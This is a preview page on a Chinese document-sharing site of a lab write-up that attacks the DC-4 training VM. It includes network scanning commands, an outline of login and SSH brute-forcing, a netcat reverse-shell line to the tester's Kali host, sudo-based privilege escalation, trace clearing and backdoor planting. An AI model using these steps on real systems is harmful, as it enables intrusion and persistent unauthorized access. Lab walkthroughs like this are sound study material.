没有合适的资源?快使用搜索试试~ 我知道了~
首页9.100个渗透测试实战#9(DC-4)
9.100个渗透测试实战#9(DC-4)
23 下载量 104 浏览量
更新于2023-03-03
评论
收藏 1.43MB PDF 举报
世间一切皆可努力 感谢浏览 目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
资源详情
资源评论
资源推荐
9.100个渗透测试实战个渗透测试实战#9((DC-4))
世间一切皆可努力
感谢浏览
目录目录
一、实验环境
二、实验流程
三、实验步骤
(一)信息收集——主机发现阶段
1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129)
2.查看靶机页面;
3.探测特定网络的主机存活状态;(netdiscover,arp-scan、nmap)
4.分析所得:
(二)信息收集——端口(服务)扫描阶段
1.扫描靶机的端口、服务、running_OS等信息;
2.分析所得:
(三)渗透测试——80端口(http服务)
1.枚举靶机网站的目录和页面等;
2.在扫描的同时,访问主页、robots.txt、指纹识别;
3.访问以上扫描的结果;
4.分析所得:
5.结合BP暴力破解该网站后台;
6.关闭BP代理,使用破解的密码happy登录后台;
7.分析所得:
(四)渗透测试——利用命令执行漏洞,Getshell
1.kali侦听,命令执行漏洞发起连接请求;
2.转换为交互式shell;
(六)渗透测试——开始致命连问,进一步信息收集,从而提升权限
1.开始致命连问;
2.分析所得:
3.hydra暴力破解ssh服务;
4.使用ssh连接工具,连接jim,进一步信息收集;
5.切换用户到charles,进一步信息收集;
6.使用teehee提权;
7.获取root家目录下的flag;
(七)清楚痕迹,留下后门
四、总结
1.在一定情况下是可以进行暴力破解登录框的(结合BP);
2.使用teehee命令的-a参数,可以写用户进/etc/passwd,也可以写定时任务/etc/crontab;
一、实验环境一、实验环境
靶机:DC-4,IP地址:192.168.97.155
测试机:Kali,IP地址:192.168.97.129
测试机:物理机Win10
连接方式:NAT
二、实验流程二、实验流程
信息收集——主机发现阶段
信息收集——端口(服务)扫描阶段
渗透测试——80端口(BP暴力破解登录框)
渗透测试——Getshell(命令执行漏洞:nc -nv 192.168.97.129 8443 -c bash)
渗透测试——22端口获取jim的shell
渗透测试——通过提示获取charles的shell
渗透测试——本地提权(通过sudo -l的提示进行teehee提权)
清楚痕迹,留下后门
三、实验步骤三、实验步骤
(一)信息收集(一)信息收集——主机发现阶段主机发现阶段
1.查看查看kali的网卡、的网卡、IP等信息;(网卡名:等信息;(网卡名:eth0,,IP地址:地址:192.168.97.129))
ifconfig -a
-a 显示详细信息
2.查看靶机页面;查看靶机页面;
3.探测特定网络的主机存活状态;(探测特定网络的主机存活状态;(netdiscover,,arp-scan、、nmap))
netdiscover -i eth0 -r 192.168.97.0/24
-i 指定出口网卡
-r 指定待扫描网段
arp-scan -l
–localnet or -l 指定扫描本地网络
nmap -sP 192.168.97.0/24
-sP ping扫描且不扫描端口
4.分析所得:分析所得:
靶机:192.168.97.155
测试机kali:192.168.97.129
(二)信息收集(二)信息收集——端口端口(服务服务)扫描阶段扫描阶段
1.扫描靶机的端口、服务、扫描靶机的端口、服务、running_OS等信息;等信息;
nmap -p- -sV -O -A 192.168.97.129
-p- 扫描全端口
-sV 扫描端口的服务信息
-O/A 扫描靶机的运行的操作系统信息
2.分析所得分析所得:
共扫描65535个端口,只有两个端口打开;
22端口处于open状态,对应开启了ssh服务;
80端口处于open状态,对应开启了http服务,使用中间件是nginx;
靶机的操作系统是Debian,推测内核版本是3.2-4.9之间;
(三)渗透测试(三)渗透测试——80端口端口(http服务服务)
1.枚举靶机网站的目录和页面等;枚举靶机网站的目录和页面等;
dirb http://192.168.97.155 /usr/share/dirb/wordlists/big.txt
如下图所示,就两个目录:css和images
御剑扫描,http://192.168.97.155
剩余12页未读,继续阅读
weixin_38663007
- 粉丝: 4
- 资源: 905
上传资源 快速赚钱
- 我的内容管理 收起
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
会员权益专享
最新资源
- ExcelVBA中的Range和Cells用法说明.pdf
- 基于单片机的电梯控制模型设计.doc
- 主成分分析和因子分析.pptx
- 共享笔记服务系统论文.doc
- 基于数据治理体系的数据中台实践分享.pptx
- 变压器的铭牌和额定值.pptx
- 计算机网络课程设计报告--用winsock设计Ping应用程序.doc
- 高电压技术课件:第03章 液体和固体介质的电气特性.pdf
- Oracle商务智能精华介绍.pptx
- 基于单片机的输液滴速控制系统设计文档.doc
- dw考试题 5套.pdf
- 学生档案管理系统详细设计说明书.doc
- 操作系统PPT课件.pptx
- 智慧路边停车管理系统方案.pptx
- 【企业内控系列】企业内部控制之人力资源管理控制(17页).doc
- 温度传感器分类与特点.pptx
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0